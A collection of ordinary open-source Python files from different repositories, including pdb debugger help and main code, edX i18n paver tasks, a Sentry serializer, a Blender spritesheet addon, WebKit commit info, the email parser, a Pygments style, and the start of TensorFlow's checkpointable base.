print >>self.stdout, """pp expression
Pretty-print the value of the expression."""
def help_exec(self):
print >>self.stdout, """(!) statement
Execute the (one-line) statement in the context of
the current stack frame.
The exclamation point can be omitted unless the first word
of the statement resembles a debugger command.
To assign to a global variable you must always prefix the
command with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)"""
def help_run(self):
print """run [args...]
Restart the debugged python program. If a string is supplied, it is
splitted with "shlex" and the result is used as the new sys.argv.
History, breakpoints, actions and debugger options are preserved.
"restart" is an alias for "run"."""
help_restart = help_run
def help_quit(self):
self.help_q()
def help_q(self):
print >>self.stdout, """q(uit) or exit - Quit from the debugger.
The program being executed is aborted."""
help_exit = help_q
def help_whatis(self):
print >>self.stdout, """whatis arg
Prints the type of the argument."""
def help_EOF(self):
print >>self.stdout, """EOF
Handles the receipt of EOF as a command."""
def help_alias(self):
print >>self.stdout, """alias [name [command [parameter parameter ...] ]]
Creates an alias called 'name' the executes 'command'. The command
must *not* be enclosed in quotes. Replaceable parameters are
indicated by %1, %2, and so on, while %* is replaced by all the
parameters. If no command is given, the current alias for name
is shown. If no name is given, all aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is recursively
applied to the first word of the command line; all other words
in the line are left alone.
Some useful aliases (especially when placed in the .pdbrc file) are:
#Print instance variables (usage "pi classInst")
alias pi for k in %1.__dict__.keys(): print "%1.",k,"=",%1.__dict__[k]
#Print instance variables in self
alias ps pi self
"""
def help_unalias(self):
print >>self.stdout, """unalias name
Deletes the specified alias."""
def help_commands(self):
print >>self.stdout, """commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber. The
commands themselves appear on the following lines. Type a line
containing just 'end' to terminate the commands.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
You can use breakpoint commands to start your program up again.
Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations) terminates
the command list (as if that command was immediately followed by end).
This is because any time you resume execution
(even with a simple next or step), you may encounter
another breakpoint--which could have its own command list, leading to
ambiguities about which list to execute.
If you use the 'silent' command in the command list, the
usual message about stopping at a breakpoint is not printed. This may
be desirable for breakpoints that are to print a specific message and
then continue. If none of the other commands print anything, you
see no sign that the breakpoint was reached.
"""
def help_pdb(self):
help()
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def _runscript(self, filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
})
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self._wait_for_mainpyfile = 1
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = 0
statement = 'execfile( "%s")' % filename
self.run(statement)
# Simplified interface
def run(statement, globals=None, locals=None):
Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
# B/W compatibility
run(statement, globals, locals)
def runcall(*args, **kwds):
return Pdb().runcall(*args, **kwds)
def set_trace():
Pdb().set_trace(sys._getframe().f_back)
# Post-Mortem interface
def post_mortem(t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
p = Pdb()
p.reset()
p.interaction(None, t)
def pm():
post_mortem(sys.last_traceback)
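# Usage sketch (illustrative only; these are the module-level helpers
# defined above):
#
#   import pdb
#   pdb.run('mymodule.test()')   # debug a statement from its first line
#   pdb.set_trace()              # break into the debugger at the call site
#   pdb.pm()                     # post-mortem on sys.last_traceback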
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
run(TESTCMD)
# print help
def help():
for dirname in sys.path:
fullname = os.path.join(dirname, 'pdb.doc')
if os.path.exists(fullname):
sts = os.system('${PAGER-more} '+fullname)
if sts: print '*** Pager exit status:', sts
break
else:
print 'Sorry, can\'t find the help file "pdb.doc"',
print 'along the Python search path'
def main():
if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
print "usage: pdb.py scriptfile [arg] ..."
sys.exit(2)
mainpyfile = sys.argv[1] # Get script filename
if not os.path.exists(mainpyfile):
print 'Error:', mainpyfile, 'does not exist'
sys.exit(1)
del sys.argv[0] # Hide "pdb.py" from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
# Note on saving/restoring sys.argv: it's a good idea when sys.argv was
# modified by the script being debugged. It's a bad idea when it was
# changed by the user from the command line. There is a "restart" command which
# allows explicit specification of command line arguments.
pdb = Pdb()
while 1:
try:
pdb._runscript(mainpyfile)
if pdb._user_requested_quit:
break
print "The program finished and will be restarted"
except Restart:
print "Restarting", mainpyfile, "with arguments:"
print "\t" + " ".join(sys.argv[1:])
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print "The program exited via sys.exit(). Exit status: ",
print sys.exc_info()[1]
except:
traceback.print_exc()
print "Uncaught exception. Entering post mortem debugging"
print "Running 'cont' or 'step' will restart the program"
t = sys.exc_info()[2]
pdb.interaction(None, t)
print "Post mortem debugger finished. The "+mainpyfile+" will be restarted"
# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
import pdb
pdb.main()
|
iglpdc/nipype
|
refs/heads/master
|
nipype/interfaces/semtools/utilities/tests/test_auto_BRAINSClipInferior.py
|
12
|
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from .....testing import assert_equal
from ..brains import BRAINSClipInferior
def test_BRAINSClipInferior_inputs():
input_map = dict(BackgroundFillValue=dict(argstr='--BackgroundFillValue %s',
),
acLowerBound=dict(argstr='--acLowerBound %f',
),
args=dict(argstr='%s',
),
environ=dict(nohash=True,
usedefault=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
inputVolume=dict(argstr='--inputVolume %s',
),
numberOfThreads=dict(argstr='--numberOfThreads %d',
),
outputVolume=dict(argstr='--outputVolume %s',
hash_files=False,
),
terminal_output=dict(nohash=True,
),
)
inputs = BRAINSClipInferior.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_BRAINSClipInferior_outputs():
output_map = dict(outputVolume=dict(),
)
outputs = BRAINSClipInferior.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
|
msebire/intellij-community
|
refs/heads/master
|
python/testData/refactoring/move/relativeImportsToModulesInSameMovedPackageNotUpdated/after/src/subpkg/subsubpkg/__init__.py
|
12133432
| |
ifduyue/django
|
refs/heads/master
|
tests/migrations/test_migrations_squashed_extra/__init__.py
|
12133432
| |
cwolferh/heat-scratch
|
refs/heads/master
|
heat/api/__init__.py
|
12133432
| |
barseghyanartur/python-social-auth
|
refs/heads/master
|
examples/django_me_example/example/app/__init__.py
|
12133432
| |
Hodorable/0602
|
refs/heads/master
|
openstack_dashboard/dashboards/identity/domains/__init__.py
|
12133432
| |
eestay/edx-platform
|
refs/heads/master
|
pavelib/i18n.py
|
6
|
"""
Internationalization tasks
"""
import sys
import subprocess
from path import path
from paver.easy import task, cmdopts, needs, sh
try:
from pygments.console import colorize
except ImportError:
colorize = lambda color, text: text # pylint: disable-msg=invalid-name
@task
@needs(
"pavelib.i18n.i18n_validate_gettext",
"pavelib.assets.compile_coffeescript",
)
@cmdopts([
("verbose", "v", "Sets 'verbose' to True"),
])
def i18n_extract(options):
"""
Extract localizable strings from sources
"""
verbose = getattr(options, "verbose", None)
cmd = "i18n_tool extract"
if verbose:
cmd += " -vv"
sh(cmd)
@task
@needs("pavelib.i18n.i18n_extract")
def i18n_generate():
"""
Compile localizable strings from sources, extracting strings first.
"""
cmd = "i18n_tool generate"
sh(cmd)
@task
@needs("pavelib.i18n.i18n_extract")
def i18n_generate_strict():
"""
Compile localizable strings from sources, extracting strings first.
Complains if files are missing.
"""
cmd = "i18n_tool generate"
sh(cmd + " --strict")
@task
@needs("pavelib.i18n.i18n_extract")
def i18n_dummy():
"""
Simulate international translation by generating dummy strings
corresponding to source strings.
"""
cmd = "i18n_tool dummy"
sh(cmd)
# Need to then compile the new dummy strings
cmd = "i18n_tool generate"
sh(cmd)
@task
def i18n_validate_gettext():
"""
Make sure GNU gettext utilities are available
"""
returncode = subprocess.call(['which', 'xgettext'])
if returncode != 0:
msg = colorize(
'red',
"Cannot locate GNU gettext utilities, which are "
"required by django for internationalization.\n (see "
"https://docs.djangoproject.com/en/dev/topics/i18n/"
"translation/#message-files)\nTry downloading them from "
"http://www.gnu.org/software/gettext/ \n"
)
sys.stderr.write(msg)
sys.exit(1)
@task
def i18n_validate_transifex_config():
"""
Make sure config file with username/password exists
"""
home = path('~').expanduser()
config = home / '.transifexrc'
    if not config.isfile() or config.getsize() == 0:
msg = colorize(
'red',
"Cannot connect to Transifex, config file is missing"
" or empty: {config} \nSee "
"http://help.transifex.com/features/client/#transifexrc \n".format(
config=config,
)
)
sys.stderr.write(msg)
sys.exit(1)
@task
@needs("pavelib.i18n.i18n_validate_transifex_config")
def i18n_transifex_push():
"""
Push source strings to Transifex for translation
"""
cmd = "i18n_tool transifex"
sh("{cmd} push".format(cmd=cmd))
@task
@needs("pavelib.i18n.i18n_validate_transifex_config")
def i18n_transifex_pull():
"""
Pull translated strings from Transifex
"""
cmd = "i18n_tool transifex"
sh("{cmd} pull".format(cmd=cmd))
@task
def i18n_rtl():
"""
Pull all RTL translations (reviewed AND unreviewed) from Transifex
"""
cmd = "i18n_tool transifex"
sh(cmd + " rtl")
print("Now generating langugage files...")
cmd = "i18n_tool generate"
sh(cmd + " --rtl")
print("Committing translations...")
sh('git clean -fdX conf/locale')
sh('git add conf/locale')
sh('git commit --amend')
@task
def i18n_ltr():
"""
Pull all LTR translations (reviewed AND unreviewed) from Transifex
"""
cmd = "i18n_tool transifex"
sh(cmd + " ltr")
print("Now generating langugage files...")
cmd = "i18n_tool generate"
sh(cmd + " --ltr")
print("Committing translations...")
sh('git clean -fdX conf/locale')
sh('git add conf/locale')
sh('git commit --amend')
@task
@needs(
"pavelib.i18n.i18n_transifex_pull",
"pavelib.i18n.i18n_extract",
"pavelib.i18n.i18n_dummy",
"pavelib.i18n.i18n_generate_strict",
)
def i18n_robot_pull():
"""
Pull source strings, generate po and mo files, and validate
"""
sh('git clean -fdX conf/locale')
# sh('paver test_i18n') # tests were removed from repo, but there should still be tests that cover the translations...
# Validate the recently pulled translations, and give a bail option
cmd = "i18n_tool validate"
sh("{cmd}".format(cmd=cmd))
con = raw_input("Continue with committing these translations (y/n)? ")
if con.lower() == 'y':
sh('git add conf/locale')
sh(
'git commit --message="Update translations '
'(autogenerated message)" --edit'
)
@task
@needs(
"pavelib.i18n.i18n_extract",
"pavelib.i18n.i18n_transifex_push",
)
def i18n_robot_push():
"""
Extract new strings, and push to transifex
"""
pass
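# Example invocations (illustrative; assumes paver is installed and the
# commands are run from the repository root, where tasks are addressed by
# their function names):
#
#   paver i18n_extract --verbose
#   paver i18n_robot_push
#   paver i18n_robot_pull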
|
vperron/sentry
|
refs/heads/master
|
src/sentry/api/serializers/models/team.py
|
13
|
from __future__ import absolute_import
import itertools
from collections import defaultdict
from sentry.api.serializers import Serializer, register, serialize
from sentry.models import (
OrganizationAccessRequest, OrganizationMemberType, Project, ProjectStatus,
Team
)
@register(Team)
class TeamSerializer(Serializer):
def get_attrs(self, item_list, user):
organization = item_list[0].organization
# TODO(dcramer): in most cases this data should already be in memory
# and we're simply duplicating efforts here
team_map = dict(
(t.id, t) for t in Team.objects.get_for_user(
organization=organization,
user=user,
)
)
if user.is_authenticated():
access_requests = frozenset(
OrganizationAccessRequest.objects.filter(
team__in=item_list,
member__user=user,
).values_list('team')
)
else:
access_requests = frozenset()
result = {}
for team in item_list:
try:
access_type = team_map[team.id].access_type
except KeyError:
access_type = None
result[team] = {
'access_type': access_type,
'pending_request': team.id in access_requests,
}
return result
def serialize(self, obj, attrs, user):
d = {
'id': str(obj.id),
'slug': obj.slug,
'name': obj.name,
'dateCreated': obj.date_added,
'isMember': attrs['access_type'] is not None,
'isPending': attrs['pending_request'],
'permission': {
'owner': attrs['access_type'] <= OrganizationMemberType.OWNER,
'admin': attrs['access_type'] <= OrganizationMemberType.ADMIN,
}
}
return d
class TeamWithProjectsSerializer(TeamSerializer):
def get_attrs(self, item_list, user):
project_qs = list(Project.objects.filter(
team__in=item_list,
status=ProjectStatus.VISIBLE,
).order_by('name', 'slug'))
project_map = defaultdict(list)
for project, data in itertools.izip(project_qs, serialize(project_qs, user)):
project_map[project.team_id].append(data)
result = super(TeamWithProjectsSerializer, self).get_attrs(item_list, user)
for team in item_list:
result[team]['projects'] = project_map[team.id]
return result
def serialize(self, obj, attrs, user):
d = super(TeamWithProjectsSerializer, self).serialize(obj, attrs, user)
d['projects'] = attrs['projects']
return d
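# A hedged usage sketch (names are illustrative): the serialize() helper
# imported above dispatches to the serializer registered for Team, or to an
# explicitly supplied serializer instance.
#
#   data = serialize(list(Team.objects.filter(organization=org)), user)
#   detailed = serialize([team], user, TeamWithProjectsSerializer())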
|
mmalyska/eve-wspace
|
refs/heads/develop
|
evewspace/Jabber/alert_methods.py
|
25
|
from Alerts.method_registry import registry
from jabber_method import JabberAlertMethod
registry.register("Jabber", JabberAlertMethod)
|
bavoha/export2d
|
refs/heads/master
|
render_sprite.py
|
1
|
bl_info = {"name": "Render Spritesheet", "category": "Render"}
import bpy
import os
import math
import addon_utils
class RenderSpritesheetOperator(bpy.types.Operator):
bl_idname = "render.render_sprite"
bl_label = "Render Spritesheet"
def _cleanup(self,path):
files = [ f for f in os.listdir(path) if f.endswith(".png") ]
for f in files:
if f[0:4] == '_tmp':
os.remove(path+"/"+f)
return
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
#print("Running 2D sprite exporter...")
#self._cleanup()
c = 0
rot_obj = bpy.data.objects.get(context.scene.rotation_object)
if not rot_obj: rot_obj = bpy.context.active_object
        old_rot = rot_obj.rotation_euler.copy()  # copy(): rotation_euler is a live reference
sprite_path = os.path.expanduser(context.scene.sprite_path)
sprite_name = context.scene.sprite_name
#sprite_colors = context.scene.sprite_colors
#tools_path = context.scene.sprite_tools_path
num_frames = context.scene.number_frames
num_directions = context.scene.number_directions
res_x = context.scene.sprite_x
res_y = context.scene.sprite_y
bpy.context.scene.render.resolution_x = res_x
bpy.context.scene.render.resolution_y = res_y
bpy.context.scene.render.resolution_percentage = 100.0
for i in range(0,num_directions):
for f in range(0,num_frames):
bpy.context.scene.frame_current = f
bpy.context.scene.render.filepath = sprite_path+"/_tmp-000-%03d.png" % (c)
bpy.ops.render.render(write_still=True)
c += 1
            rot_obj.rotation_euler[2] += -math.pi * 2 / num_directions
rot_obj.rotation_euler = old_rot
        try: os.mkdir(sprite_path)
        except OSError: pass  # directory already exists
os.chdir(sprite_path)
#cmd = '"'+tools_path+'/montage" _tmp-000*.png -background transparent -geometry +0+0 -resize '+str(res_x)+'x'+str(res_y)+' -tile '+str(num_frames)+'x'+str(num_directions)+' '+sprite_name+'.png'
cmd = 'montage _tmp-000*.png -background transparent -geometry +0+0 -resize '+str(res_x)+'x'+str(res_y)+' -tile '+str(num_frames)+'x'+str(num_directions)+' '+sprite_name+'.png'
print(cmd)
r = os.system(cmd)
"""if sprite_colors != 0:
os.system('"'+tools_path+'/pngnqi" -vf -e -indexed.png -g 2.2 -s 1 -Q n -n '+str(sprite_colors)+' '+sprite_name+'.png')
os.system('"'+tools_path+'/pngout" /y /ktEXt '+sprite_name+'-indexed.png '+sprite_name+'-indexed.png')
os.remove(sprite_name+'.png')
os.rename(sprite_name+'-indexed.png', sprite_name+'.png')
"""
#os.startfile(sprite_path)
self._cleanup(sprite_path)
return {'FINISHED'}
class RenderSpritePanel(bpy.types.Panel):
bl_label = "Render Spritesheet"
bl_idname = "RENDER_SPRITESHEET"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "render"
def draw(self, context):
row = self.layout.row()
#col = row.column()
row.prop(bpy.context.scene, "rotation_object")
row = self.layout.row()
row.prop(bpy.context.scene, "number_directions")
row.prop(bpy.context.scene, "number_frames")
row = self.layout.row()
row.prop(bpy.context.scene, "sprite_path")
row = self.layout.row()
row.prop(bpy.context.scene, "sprite_name")
row = self.layout.row()
row.prop(bpy.context.scene, "sprite_x")
row.prop(bpy.context.scene, "sprite_y")
#row.prop(bpy.context.scene, "sprite_colors")
#row = self.layout.row()
#row.prop(bpy.context.scene, "sprite_tools_path")
row = self.layout.row()
row.operator("render.render_sprite")
def register():
bpy.types.Scene.rotation_object = bpy.props.StringProperty(name="Rot. Object", default="None")
bpy.types.Scene.number_directions = bpy.props.IntProperty(name="Num. Directions", default=8)
bpy.types.Scene.number_frames = bpy.props.IntProperty(name="Num. Frames", default=8)
bpy.types.Scene.sprite_x = bpy.props.IntProperty(name="Width", default=128)
bpy.types.Scene.sprite_y = bpy.props.IntProperty(name="Height", default=128)
bpy.types.Scene.sprite_path = bpy.props.StringProperty(name="Sprite Path:", default="~")
bpy.types.Scene.sprite_name = bpy.props.StringProperty(name="Sprite Name:", default="sprite")
#bpy.types.Scene.sprite_tools_path = bpy.props.StringProperty(name="Tools Path:", default=addon_utils.paths()[1] + "/")
#bpy.types.Scene.sprite_colors = bpy.props.IntProperty(name="Colors", default=0)
bpy.utils.register_class(RenderSpritesheetOperator)
bpy.utils.register_class(RenderSpritePanel)
def unregister():
bpy.utils.unregister_class(RenderSpritePanel)
bpy.utils.unregister_class(RenderSpritesheetOperator)
if __name__ == "__main__":
register()
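# Usage sketch: once the addon is enabled, the "Render Spritesheet" panel
# appears under Properties > Render; the operator can also be invoked from
# Blender's Python console via its bl_idname:
#
#   bpy.ops.render.render_sprite()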
|
saisai/phantomjs
|
refs/heads/master
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/checkout/commitinfo.py
|
118
|
# Copyright (c) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# WebKit's python module for holding information on a commit
from webkitpy.common.config import urls
from webkitpy.common.config.committers import CommitterList
class CommitInfo(object):
def __init__(self, revision, committer_email, changelog_data, committer_list=CommitterList()):
self._revision = revision
self._committer_email = committer_email
self._changelog_data = changelog_data
# Derived values:
self._committer = committer_list.committer_by_email(committer_email)
def revision(self):
return self._revision
def committer(self):
return self._committer # None if committer isn't in contributors.json
def committer_email(self):
return self._committer_email
def bug_id(self):
return self._changelog_data["bug_id"] # May be None
def author(self):
return self._changelog_data["author"] # May be None
def author_name(self):
return self._changelog_data["author_name"]
def author_email(self):
return self._changelog_data["author_email"]
def reviewer(self):
return self._changelog_data["reviewer"] # May be None
def reviewer_text(self):
return self._changelog_data["reviewer_text"] # May be None
def changed_files(self):
return self._changelog_data["changed_files"]
def to_json(self):
return {
"bug_id": self.bug_id(),
"author_name": self.author_name(),
"author_email": self.author_email(),
"reviewer_text": self.reviewer_text(),
"changed_files": self.changed_files(),
}
def responsible_parties(self):
responsible_parties = [
self.committer(),
self.author(),
self.reviewer(),
]
return set([party for party in responsible_parties if party]) # Filter out None
# FIXME: It is slightly lame that this "view" method is on this "model" class (in MVC terms)
def blame_string(self, bugs):
string = "r%s:\n" % self.revision()
string += " %s\n" % urls.view_revision_url(self.revision())
string += " Bug: %s (%s)\n" % (self.bug_id(), bugs.bug_url_for_bug_id(self.bug_id()))
author_line = "\"%s\" <%s>" % (self.author_name(), self.author_email())
string += " Author: %s\n" % (self.author() or author_line)
string += " Reviewer: %s\n" % (self.reviewer() or self.reviewer_text())
string += " Committer: %s" % self.committer()
return string
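# A minimal usage sketch (revision, email, and changelog values are made up
# for illustration; the dict keys mirror those read by the accessors above):
#
#   info = CommitInfo(12345, "committer@example.com", {
#       "bug_id": 54321, "author": None, "author_name": "A. Author",
#       "author_email": "author@example.com", "reviewer": None,
#       "reviewer_text": "R. Reviewer", "changed_files": ["ChangeLog"],
#   })
#   print info.blame_string(bugs)  # `bugs` would supply bug_url_for_bug_id()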
|
luistorresm/odoo
|
refs/heads/8.0
|
addons/website_membership/controllers/__init__.py
|
7372
|
import main
|
blacklin/kbengine
|
refs/heads/master
|
kbe/src/lib/python/Lib/email/parser.py
|
86
|
# Copyright (C) 2001-2007 Python Software Foundation
# Author: Barry Warsaw, Thomas Wouters, Anthony Baxter
# Contact: email-sig@python.org
"""A parser of RFC 2822 and MIME email messages."""
__all__ = ['Parser', 'HeaderParser', 'BytesParser', 'BytesHeaderParser',
'FeedParser', 'BytesFeedParser']
from io import StringIO, TextIOWrapper
from email.feedparser import FeedParser, BytesFeedParser
from email._policybase import compat32
class Parser:
def __init__(self, _class=None, *, policy=compat32):
"""Parser of RFC 2822 and MIME email messages.
Creates an in-memory object tree representing the email message, which
can then be manipulated and turned over to a Generator to return the
textual representation of the message.
The string must be formatted as a block of RFC 2822 headers and header
        continuation lines, optionally preceded by a `Unix-from' header. The
header block is terminated either by the end of the string or by a
blank line.
_class is the class to instantiate for new message objects when they
must be created. This class must have a constructor that can take
zero arguments. Default is Message.Message.
The policy keyword specifies a policy object that controls a number of
aspects of the parser's operation. The default policy maintains
backward compatibility.
"""
self._class = _class
self.policy = policy
def parse(self, fp, headersonly=False):
"""Create a message structure from the data in a file.
Reads all the data from the file and returns the root of the message
structure. Optional headersonly is a flag specifying whether to stop
parsing after reading the headers or not. The default is False,
meaning it parses the entire contents of the file.
"""
feedparser = FeedParser(self._class, policy=self.policy)
if headersonly:
feedparser._set_headersonly()
while True:
data = fp.read(8192)
if not data:
break
feedparser.feed(data)
return feedparser.close()
def parsestr(self, text, headersonly=False):
"""Create a message structure from a string.
Returns the root of the message structure. Optional headersonly is a
flag specifying whether to stop parsing after reading the headers or
not. The default is False, meaning it parses the entire contents of
the file.
"""
return self.parse(StringIO(text), headersonly=headersonly)
class HeaderParser(Parser):
def parse(self, fp, headersonly=True):
return Parser.parse(self, fp, True)
def parsestr(self, text, headersonly=True):
return Parser.parsestr(self, text, True)
class BytesParser:
def __init__(self, *args, **kw):
"""Parser of binary RFC 2822 and MIME email messages.
Creates an in-memory object tree representing the email message, which
can then be manipulated and turned over to a Generator to return the
textual representation of the message.
The input must be formatted as a block of RFC 2822 headers and header
        continuation lines, optionally preceded by a `Unix-from' header. The
header block is terminated either by the end of the input or by a
blank line.
_class is the class to instantiate for new message objects when they
must be created. This class must have a constructor that can take
zero arguments. Default is Message.Message.
"""
self.parser = Parser(*args, **kw)
def parse(self, fp, headersonly=False):
"""Create a message structure from the data in a binary file.
Reads all the data from the file and returns the root of the message
structure. Optional headersonly is a flag specifying whether to stop
parsing after reading the headers or not. The default is False,
meaning it parses the entire contents of the file.
"""
fp = TextIOWrapper(fp, encoding='ascii', errors='surrogateescape')
try:
return self.parser.parse(fp, headersonly)
finally:
fp.detach()
def parsebytes(self, text, headersonly=False):
"""Create a message structure from a byte string.
Returns the root of the message structure. Optional headersonly is a
flag specifying whether to stop parsing after reading the headers or
not. The default is False, meaning it parses the entire contents of
the file.
"""
text = text.decode('ASCII', errors='surrogateescape')
return self.parser.parsestr(text, headersonly)
class BytesHeaderParser(BytesParser):
def parse(self, fp, headersonly=True):
return BytesParser.parse(self, fp, headersonly=True)
def parsebytes(self, text, headersonly=True):
return BytesParser.parsebytes(self, text, headersonly=True)
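# Example (illustrative) of the Parser API defined above:
#
#   from email.parser import Parser
#   msg = Parser().parsestr(
#       "From: a@example.com\nSubject: hi\n\nbody\n")
#   msg["subject"]       # -> 'hi'
#   msg.get_payload()    # -> 'body\n'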
|
gauribhoite/personfinder
|
refs/heads/master
|
env/site-packages/pygments/styles/trac.py
|
135
|
# -*- coding: utf-8 -*-
"""
pygments.styles.trac
~~~~~~~~~~~~~~~~~~~~
Port of the default trac highlighter design.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class TracStyle(Style):
"""
Port of the default trac highlighter design.
"""
default_style = ''
styles = {
Whitespace: '#bbbbbb',
Comment: 'italic #999988',
Comment.Preproc: 'bold noitalic #999999',
Comment.Special: 'bold #999999',
Operator: 'bold',
String: '#bb8844',
String.Regex: '#808000',
Number: '#009999',
Keyword: 'bold',
Keyword.Type: '#445588',
Name.Builtin: '#999999',
Name.Function: 'bold #990000',
Name.Class: 'bold #445588',
Name.Exception: 'bold #990000',
Name.Namespace: '#555555',
Name.Variable: '#008080',
Name.Constant: '#008080',
Name.Tag: '#000080',
Name.Attribute: '#008080',
Name.Entity: '#800080',
Generic.Heading: '#999999',
Generic.Subheading: '#aaaaaa',
Generic.Deleted: 'bg:#ffdddd #000000',
Generic.Inserted: 'bg:#ddffdd #000000',
Generic.Error: '#aa0000',
Generic.Emph: 'italic',
Generic.Strong: 'bold',
Generic.Prompt: '#555555',
Generic.Output: '#888888',
Generic.Traceback: '#aa0000',
Error: 'bg:#e3d2d2 #a61717'
}
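# Example usage (illustrative): rendering a snippet to HTML with this style.
#
#   from pygments import highlight
#   from pygments.lexers import PythonLexer
#   from pygments.formatters import HtmlFormatter
#   print(highlight('print("hi")', PythonLexer(),
#                   HtmlFormatter(style='trac')))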
|
hehongliang/tensorflow
|
refs/heads/master
|
tensorflow/python/training/checkpointable/base.py
|
11
|
"""An object-local variable management scheme."""
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import functools
import json
import weakref
import six
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_io_ops as io_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import saveable_object
from tensorflow.python.util import nest
from tensorflow.python.util import serialization
from tensorflow.python.util import tf_decorator
# Key where the object graph proto is saved in a TensorBundle
OBJECT_GRAPH_PROTO_KEY = "_CHECKPOINTABLE_OBJECT_GRAPH"
# A key indicating a variable's value in an object's checkpointed Tensors
# (Checkpointable._gather_saveables_for_checkpoint). If this is the only key and
# the object has no dependencies, then its value may be restored on object
# creation (avoiding double assignment when executing eagerly).
VARIABLE_VALUE_KEY = "VARIABLE_VALUE"
OBJECT_CONFIG_JSON_KEY = "OBJECT_CONFIG_JSON"
CheckpointableReference = collections.namedtuple(
"CheckpointableReference",
[
# The local name for this dependency.
"name",
# The Checkpointable object being referenced.
"ref"
])
class CheckpointInitialValue(ops.Tensor):
"""Tensor wrapper for managing update UIDs in `Variables`.
When supplied as an initial value, objects of this type let a `Variable`
(`Variable`, `ResourceVariable`, etc.) know the UID of the restore the initial
value came from. This allows deferred restorations to be sequenced in the
